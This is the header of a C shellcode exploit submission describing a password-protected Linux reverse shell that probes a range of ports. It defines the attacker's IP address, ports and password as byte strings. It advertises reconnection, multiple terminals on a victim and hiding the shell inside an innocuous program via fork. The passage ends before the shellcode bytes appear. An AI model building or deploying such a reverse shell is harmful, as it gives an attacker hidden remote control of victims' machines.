#include #include // Exploit Title: [Continuously-Probing Reverse Shell via Socket + port-range + password (172 bytes)] // Date: [07/10/2016] // Exploit Author: [CripSlick] // Tested on: [Kali 2.0] // Version: [No program being used or exploited; I only relied on syscalls] //========================================================================================= // ===================== Why use Da LaCrips Reverse Shell?? ============================= // 1. The victim can lauch the payload and THEN you can connect (unlike // every other reverse shell where you must be ready for the connection ahead of time) // 2. You get multiple ports (that means multiple terminals can run on a single victim) // 3. If your connection/port gets disconnected, you can accept that port connection right back again // 4. You will be able to access any linux system disto via syscalls // 5. You you get a password and easy to change variables // 6. You can easily link it to an innocuous program sense the terminal closes via fork after launch // ENJOY!! //========================================================================================= //ShepherdDowling@gmail.com //OffSec ID: OS-20614 //http://50.112.22.183/ #define IPv4 "\x0a\x01\x01\x04" //in forward-byte-order #define High_Port "\x8f\x01" //399 //in reverse-byte-order #define Low_Port "\x86\x01" //390 //in reverse-byte-order // python + import socket + hex(socket.htons()) #define Password "\x6c\x61\x20\x63\x72\x69\x70\x73" // in forward-byte-order // Default Password = 'la crips' without quotes // python + ''[::1].encode('hex') // you can use complex ascii characters // example: \x21\x40\x20\x3C\x52\x7C\x70\x24 = !@